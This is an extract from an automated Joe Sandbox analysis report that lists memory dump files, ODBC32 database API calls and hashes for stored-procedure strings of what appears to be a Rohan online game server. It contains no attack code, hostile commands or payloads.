                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetNGuildWarRegisterList] (?)}
                                                                                      • API String ID: 0-1051908665
                                                                                      • Opcode ID: 10a191172d0ea1954ce657809ef232fcc0b3dd746639af31e31df700d53e7c57
                                                                                      • Instruction ID: fff003d307a664511a0fb9e791b420d1cc34b1f25e93dd7badb91ca06d579ad7
                                                                                      • Opcode Fuzzy Hash: 10a191172d0ea1954ce657809ef232fcc0b3dd746639af31e31df700d53e7c57
                                                                                      • Instruction Fuzzy Hash: CA11C0B5B4435CABEB24CF44CC51FAA7335EB85724F10C289F6152A6C4C6B569408F5A
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetRank](?)},000000FD), ref: 0042CA16
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042CA55
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042CA8A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetRank](?)}, xrefs: 0042CA0D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetRank](?)}
                                                                                      • API String ID: 0-1376603591
                                                                                      • Opcode ID: f2c409096be3ea6be6767a8ae431584484dc7391de3648ff75fed8cf951830b1
                                                                                      • Instruction ID: 9e2de515f4152854fbbc4f8a636492e54a7222c3aa3fc0803dffc32049918515
                                                                                      • Opcode Fuzzy Hash: f2c409096be3ea6be6767a8ae431584484dc7391de3648ff75fed8cf951830b1
                                                                                      • Instruction Fuzzy Hash: 6F11C0F1A44318ABEB649F44CC91FAA7335EB84714F20828DF7192A2C4C7B9A9448F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GOLDENCASTLE_GET_MASTER_ID] (?)},000000FD), ref: 00433A82
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00433AC1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433AF6
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GOLDENCASTLE_GET_MASTER_ID] (?)}, xrefs: 00433A79
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GOLDENCASTLE_GET_MASTER_ID] (?)}
                                                                                      • API String ID: 0-2413047674
                                                                                      • Opcode ID: b1953e303fce03ff7b3044a88fb41e46534008c27a3c97961f9a44120bc8bacb
                                                                                      • Instruction ID: a3edad18b4732c717e7ef281bdbd1337a011f1fcbc196eb78575a9e2d9054da2
                                                                                      • Opcode Fuzzy Hash: b1953e303fce03ff7b3044a88fb41e46534008c27a3c97961f9a44120bc8bacb
                                                                                      • Instruction Fuzzy Hash: 951100B1B40318ABEB64CF44CC52FE97334EB45714F204289F7157A6C1DAB569808F99
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_PK_GetRewardItemOfCharacter] (?)},000000FD), ref: 0043CA42
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043CA81
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043CAB6
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_PK_GetRewardItemOfCharacter] (?)}, xrefs: 0043CA39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_PK_GetRewardItemOfCharacter] (?)}
                                                                                      • API String ID: 0-1541250590
                                                                                      • Opcode ID: f4566918bc06c22270c509dd5020c99dfb720cbbbe1f870ffa92c8fcf00bbce9
                                                                                      • Instruction ID: b0f31d741ff805cb4eb42daee7453ca0896506025faa6b9c1340346742edf8ff
                                                                                      • Opcode Fuzzy Hash: f4566918bc06c22270c509dd5020c99dfb720cbbbe1f870ffa92c8fcf00bbce9
                                                                                      • Instruction Fuzzy Hash: B811C3B1A8421BABDB34CF44CC51F7E7335EF84714F1082A9F6142A6C9C67569419B98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetRewardItemOfCharacter] (?)},000000FD), ref: 0043CAE0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043CB1F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043CB54
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetRewardItemOfCharacter] (?)}, xrefs: 0043CAD7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetRewardItemOfCharacter] (?)}
                                                                                      • API String ID: 0-3501683791
                                                                                      • Opcode ID: 1a67792c6869e4277c0c0376e12e454bb4ab07d5f485900d53418f0a607c9fce
                                                                                      • Instruction ID: 11bb0acf54577c9213a56d71e1ef5ac13e2c011f8c2ad480bac809de1f558224
                                                                                      • Opcode Fuzzy Hash: 1a67792c6869e4277c0c0376e12e454bb4ab07d5f485900d53418f0a607c9fce
                                                                                      • Instruction Fuzzy Hash: 671100B1A8022BABEB34CF44CC52FB97334EF44714F1082A9F6246A6C4D6B56D409F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelIndunRanker] (?)},000000FD), ref: 0043BAFD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043BB3C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043BB71
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelIndunRanker] (?)}, xrefs: 0043BAF4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelIndunRanker] (?)}
                                                                                      • API String ID: 0-4048068192
                                                                                      • Opcode ID: 663917e4b04a08c80d80bc0860424707686a0bfdcb94fb2171fcd8e20920dbb3
                                                                                      • Instruction ID: c1ba73b229bd4ba3e884c42e69e0dde773dd4abfaefb59a109b1d064179c1526
                                                                                      • Opcode Fuzzy Hash: 663917e4b04a08c80d80bc0860424707686a0bfdcb94fb2171fcd8e20920dbb3
                                                                                      • Instruction Fuzzy Hash: F91116B0645215ABEB34CF44CC51FBA7334EB88724F208299F7142E6C4CA756D819F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetMapMemo] (?)},000000FD), ref: 00431B64
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00431BA3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00431BD8
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetMapMemo] (?)}, xrefs: 00431B5B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetMapMemo] (?)}
                                                                                      • API String ID: 0-147915359
                                                                                      • Opcode ID: b81d2b3f357f1ed7c3b846585bbacf4fc87c071e79504b09e5dd3b87b57e39a7
                                                                                      • Instruction ID: 219e9cb186abbc6be62505a5e30732aa202d86f68cceeae65f254c2638a2064c
                                                                                      • Opcode Fuzzy Hash: b81d2b3f357f1ed7c3b846585bbacf4fc87c071e79504b09e5dd3b87b57e39a7
                                                                                      • Instruction Fuzzy Hash: 8E11D6B1A4421CA7EB20CF55CC42F9973B4FB44714F21C285F7586E2C4DD766980CB98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_ResetAssassinRegTime] (?)},000000FD), ref: 00438065
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004380A7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004380DC
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_ResetAssassinRegTime] (?)}, xrefs: 0043805C
                                                                                      Memory Dump Source
